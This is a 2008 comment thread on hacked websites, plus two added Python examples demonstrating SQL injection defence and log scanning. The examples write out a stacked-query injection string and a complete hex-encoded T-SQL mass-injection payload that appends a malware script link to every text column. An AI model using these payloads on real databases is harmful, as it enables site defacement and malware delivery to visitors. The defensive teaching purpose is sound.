43 Comments
- inactive, on 07/17/2008, -1/+13Alright, that's it, shut down the internet, we all lose the privilege.
- justananomaly, on 07/17/2008, -2/+12If hackers/exploiters didn't exist a lot of security people would lose their job. A little chaos can do a lot for the economy.
- xlocust, on 07/17/2008, -0/+9open source != secure
Ask anybody with a hacked Drupal or WordPress site.
- Matt2k, on 07/17/2008, -0/+9This. um.. A firewall?.. Oh nevermind
- xlocust, on 07/17/2008, -1/+9No firewall in the world is going to prevent your site from being hacked if you're on a webserver using an insecure PHP setup and/or insecure PHP code.
- taylorblue, on 07/16/2008, -2/+10My old site was hacked three times finally putting me under and I found that site on one of the searches they said to do...it's a very scary world out there...
- jpaolini, on 07/17/2008, -1/+7Interesting article, it's a shame so many people are running insecure code and websites.
- thesparrowband, on 07/17/2008, -1/+7i think you just described the plot to at least 5 movies. the 5th element to name one..
- hugepedlar, on 07/17/2008, -0/+5The NHS is run on Microsoft technology, which always struck me (when I worked for them) as a bad idea, especially where our private medical records are concerned. Anyone know how these hacks are taking place? No clues from the article.
- inactive, on 07/17/2008, -0/+4lol firewall. i guess you don't want people hitting your site at all then.
- MikeFromAmerica, on 07/17/2008, -0/+4That sounds an awful lot like the rationale that war is good for the economy.
(oops. meant to reply to justananomaly. too many reply links...)
- shakin, on 07/17/2008, -0/+3"the big difference is that open source tends to get patched quicker."
And if, for example, you're running a vulnerable version of Drupal or other open source software you can fix it yourself.
- justananomaly, on 07/17/2008, -0/+3Think of the engineers who can go home to feed their children tonight to have little teeny weeny children of their own and so on and so forth.. thus adding to the great chain of life!
*chokes on cherry*
- thedarkwolf, on 07/17/2008, -0/+3True that. Or really any code, not just PHP. At least with PHP you can usually fix the vulnerability in one line. mysql_real_escape_string() anybody. How about htmlspecialchars() for those pesky JavaScript injections.
The truth is, the only way to secure your website is if you know what you're doing.
- Gavagai80, on 07/17/2008, -0/+3Unfortunately most people just don't care. When I send out a notification of a security update for my scripts, I'd estimate about 30% of users actually install it within a reasonable time frame.
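As an added illustration of thedarkwolf's "fix it in one line" point (example code written for this page, not code from any commenter): the same article lookup built by string concatenation and built with a bound parameter, run against a constructed in-memory SQLite table. Bound parameters are used here instead of an escaping function such as mysql_real_escape_string(), since they remove the parsing problem rather than patching over it. SQLite's executescript() stands in for a driver that accepts stacked statements, as classic ADO against SQL Server did, which is what let an injected UPDATE run behind a harmless-looking SELECT. The malware host name is hypothetical.

```python
import html
import sqlite3

# Constructed sample data: a tiny CMS table of the kind the thread describes
# being bulk-updated with script links. Not taken from any real site.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles (title, body) VALUES ('Hello', 'First post');
        INSERT INTO articles (title, body) VALUES ('News',  'Second post');
    """)
    return con

# Hypothetical malware host; this tag is what the injected UPDATE appends to every row.
SCRIPT_TAG = "<script src=http://malware.example/m.js></script>"

# Attacker-supplied "id" parameter: closes the quoted literal, stacks an UPDATE
# that appends the tag to every body, then comments out the rest of the query.
INJECTED_ID = "1'; UPDATE articles SET body = body || '" + SCRIPT_TAG + "'; --"

def infected_rows(con):
    """Number of rows whose body now carries the injected script tag."""
    return con.execute(
        "SELECT COUNT(*) FROM articles WHERE instr(body, ?) > 0", (SCRIPT_TAG,)
    ).fetchone()[0]

def vulnerable_lookup(con, article_id):
    """Builds the SQL by concatenation. executescript() plays the role of a
    driver that runs stacked statements, so the attacker's UPDATE executes.
    Returns how many rows were defaced as a result."""
    sql = "SELECT body FROM articles WHERE id = '" + str(article_id) + "'"
    con.executescript(sql)
    return infected_rows(con)

def safe_lookup(con, article_id):
    """Parameterised query: the value is bound, never parsed as SQL, so the
    stacked UPDATE is just an id that matches nothing. Returns (rows, defaced)."""
    rows = con.execute(
        "SELECT body FROM articles WHERE id = ?", (article_id,)
    ).fetchall()
    return rows, infected_rows(con)

def render(body):
    """Output encoding (the htmlspecialchars() point): even a body that already
    contains a script tag is shown to the browser as text, not executed."""
    return html.escape(body, quote=True)

if __name__ == "__main__":
    con = make_db()
    print("safe:", safe_lookup(con, INJECTED_ID))              # ([], 0)
    print("vulnerable:", vulnerable_lookup(con, INJECTED_ID))  # 2
    print(render(con.execute("SELECT body FROM articles WHERE id = 1").fetchone()[0]))
```

The two lookups take the same input; only the vulnerable one changes the table. Note that render() protects the reader's browser after the fact, but it does not undo the defacement, which still needs the restore-and-fix cycle described later in the thread.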
- redlantern64, on 07/17/2008, -0/+3Best site hack ever: http://news.bbc.co.uk/1/hi/sci/tech/386565.stm
- thedarkwolf, on 07/17/2008, -0/+3open source may not be secure. In fact, in general there are about the same amount of vulnerabilities in closed source as in open source. the big difference is that open source tends to get patched quicker.
- elders, on 07/17/2008, -2/+4retard
- jellygraph, on 07/17/2008, -0/+2Crime keeps the economy ticking, eh? Interesting theory. Not sure what most people and experts would think of it tho.
- inactive, on 07/17/2008, -0/+2This is why we can't have nice things.
- ramd3z, on 07/17/2008, -0/+2We got nailed 3 times in 1 week by this until finding this site to search for, remove, then prevent the injection again. In the end this site plus better coding practices plus using an HTTP proxy on our firewall have been keeping us safe
http://www.bloombit.com/Articles/2008/05/ASCII-Enc ...
- Gavagai80, on 07/17/2008, -0/+2Instead of generalizing a theory that open source is patched quicker, a smart person will actually check how often the software they're considering gets patched.
- ripter, on 07/17/2008, -1/+2It's a shame that people write
- Matt2k, on 07/17/2008, -0/+1I think we might be confusing open source with copyleft software.
Almost all web applications are already open source, if not 'free'. Except for the few guys who distribute their stuff obfuscated (Ioncube, ) or compiled (.NET, JSP, ...).
- Nextrix, on 07/17/2008, -0/+1And if there weren't any exploits being created or found then the security people would all be out of a job.
- slug007, on 07/17/2008, -2/+3Test, then apply security updates asap. Open Source as well!
- shftleft, on 07/18/2008, -0/+1Why so many parking tickets?
- TRScheel, on 07/17/2008, -0/+1Hey dont knock that kinda security. At least it wont get hacked!
- inactive, on 07/17/2008, -0/+1awesome.
- jellygraph, on 07/17/2008, -0/+1Hehe, I'm glad I get to run and administer all my company's servers myself. I wouldn't trust any other geek I've never met before.
- dakellog, on 07/18/2008, -0/+1nhh.uk and snapple.com, two hacked sites, run IIS. I searched google for other hacked sites. The first 3 hacked sites I reviewed ran Windows software. I have read many articles about hacks, only to find out the sites run IIS. Not once have I seen an author mention that Microsoft wrote the software that enabled the hackers to do their work, and using Linux or BSD would solve many of these problems.
- justananomaly, on 07/17/2008, -0/+1The air force is spending millions investing in "Cyber Command" centers in airforce bases across the country. Without hackers/exploiters...?
- Matt2k, on 07/17/2008, -0/+1They're just SQL injection attacks. Nothing special about them being on Microsoft products.
There's nothing magical about securing an IIS server versus an Apache one. Run each website in a securely partitioned jail with script applications impersonating the security context of the hosted app, and you're miles ahead of most other people.
If they're the same ones my clients have been getting hit with, they inject a TSQL stored procedure that bulk updates all text fields in the database with script links to malware JS files. Usually it's a destructive process, although sometimes they're kind enough to append instead of obliterate.
Aside from auditing everyone's custom programming, I usually have to restore from a backup, fix the identified point of compromise, and run Paros Proxy to scan for other obvious SQL injection holes. I also like to install a filter on IIS that limits querystrings to 512 characters or so. This obviously doesn't protect against POST methods.
- AnarchyIsOrder1, on 07/18/2008, -0/+1Broken window fallacy
http://freedomkeys.com/window.htm
- inactive, on 07/18/2008, -0/+1Yeah, because every server out there is just sitting wide open on the internet.
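Matt2k's comment above describes the payload (a T-SQL routine that appends script links to every text column) and two practical responses: search for the injection, and cap the querystring length on IIS. The mass-injection bots of that period hid the routine as a hex blob, `DECLARE @S VARCHAR(4000);SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S)`, so the request itself carried no quotes or UPDATE keyword. As an added example (not code from the thread or from any commenter), the scanner below reads constructed IIS-style log lines, decodes any such CAST blob back to T-SQL, pulls out the script URL, and applies the 512-character check; the T-SQL, log lines, field layout and host names are all constructed here for illustration.

```python
import re
from urllib.parse import quote, unquote_plus

MAX_QUERY_LEN = 512  # the IIS querystring cap from the comment; POST bodies bypass it

# Constructed T-SQL in the shape the comment describes: walk every text-typed
# column of every user table and append a script tag. Hypothetical host name.
SCRIPT_TAG = "<script src=http://malware.example/m.js></script>"
INJECTED_TSQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b "
    "WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''" + SCRIPT_TAG + "''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)

def hex_wrap(tsql):
    """Wrap T-SQL the way the injection bots did: hex-encode it so no quotes or
    keywords appear in the request, and have the server decode and EXEC it."""
    return ("DECLARE @S VARCHAR(4000);SET @S=CAST(0x" + tsql.encode("latin-1").hex().upper()
            + " AS VARCHAR(4000));EXEC(@S);--")

# Constructed log lines, space separated as: date time s-ip cs-method
# cs-uri-stem cs-uri-query s-port c-ip sc-status. Not captured from any site.
SAMPLE_LOG = [
    "2008-07-14 02:10:51 10.0.0.5 GET /products.asp id=7&page=2 80 198.51.100.23 200",
    "2008-07-14 02:10:58 10.0.0.5 GET /default.asp - 80 198.51.100.23 200",
    "2008-07-14 02:11:09 10.0.0.5 GET /products.asp id=1;"
    + quote(hex_wrap(INJECTED_TSQL), safe="=;(),@/") + " 80 203.0.113.7 200",
]

CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\s+src=['\"]?([^'\"\s>]+)", re.IGNORECASE)
TSQL_RE = re.compile(r"\b(DECLARE|EXEC)\b|CAST\(\s*0x", re.IGNORECASE)  # heuristic

def decode_cast_payloads(text):
    """Decode each CAST(0x... AS VARCHAR|NVARCHAR) blob in text. VARCHAR blobs
    are single-byte, NVARCHAR blobs are UTF-16-LE; odd-length hex is skipped."""
    decoded = []
    for hexstr, kind in CAST_RE.findall(text):
        try:
            raw = bytes.fromhex(hexstr)
        except ValueError:
            continue
        enc = "utf-16-le" if kind.upper().startswith("N") else "latin-1"
        decoded.append(raw.decode(enc, errors="replace"))
    return decoded

def analyse_log_line(line):
    """Verdict dict for one log line, or None for header/comment or short lines."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 9:
        return None
    query = "" if fields[5] == "-" else unquote_plus(fields[5])
    verdict = {"method": fields[3], "uri": fields[4], "client": fields[7],
               "query_len": len(query), "reasons": [], "script_urls": []}
    if len(query) > MAX_QUERY_LEN:
        verdict["reasons"].append("querystring longer than %d" % MAX_QUERY_LEN)
    if TSQL_RE.search(query):
        verdict["reasons"].append("T-SQL keywords in querystring")
    for payload in decode_cast_payloads(query):
        if "UPDATE" in payload.upper():
            verdict["reasons"].append("decoded CAST payload contains UPDATE")
        verdict["script_urls"].extend(SCRIPT_RE.findall(payload))
    return verdict

def scan_log(lines):
    """Verdicts for every parseable line; filter on 'reasons' to get the hits."""
    return [v for v in map(analyse_log_line, lines) if v is not None]

if __name__ == "__main__":
    for v in scan_log(SAMPLE_LOG):
        if v["reasons"]:
            print(v["client"], v["method"], v["uri"], v["reasons"], v["script_urls"])
```

The decoded script URL is the string to search the database for when cleaning up, and the keyword and length checks are the same tests a request filter would apply inline. As the comment says, a querystring cap only sees GET requests; the same decode and keyword checks need to run over POST bodies as well, which the web server log does not record.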
- stabbingkittens, on 07/18/2008, -0/+1Malware is a sham
- thedarkwolf, on 07/17/2008, -2/+2lol tru dat. I'm not at all worried. There will always be plenty of people out there writing the malware and I will always have at least that small measure of job security.
- davdev, on 07/17/2008, -1/+1My company's site was hit because our hosting vendor sucks, and while doing a system upgrade they moved the code from one server to another that hadn't been properly wiped before the transfer. It was infected with a worm and anyone who logged onto our site had their PC infected and shut down. It was not good times.
- pizzaguy01, on 07/17/2008, -1/+0whew my site is safe :D
- Hotrox, on 07/17/2008, -4/+3It's a shame that people write malware.
- kmolnar, on 07/17/2008, -2/+0Dumbass.
Firewalls are for clients, not servers.
RTFA.
- CLAWC, on 07/16/2008, -12/+1Pwned! Just kidding. Use a strong firewall people!

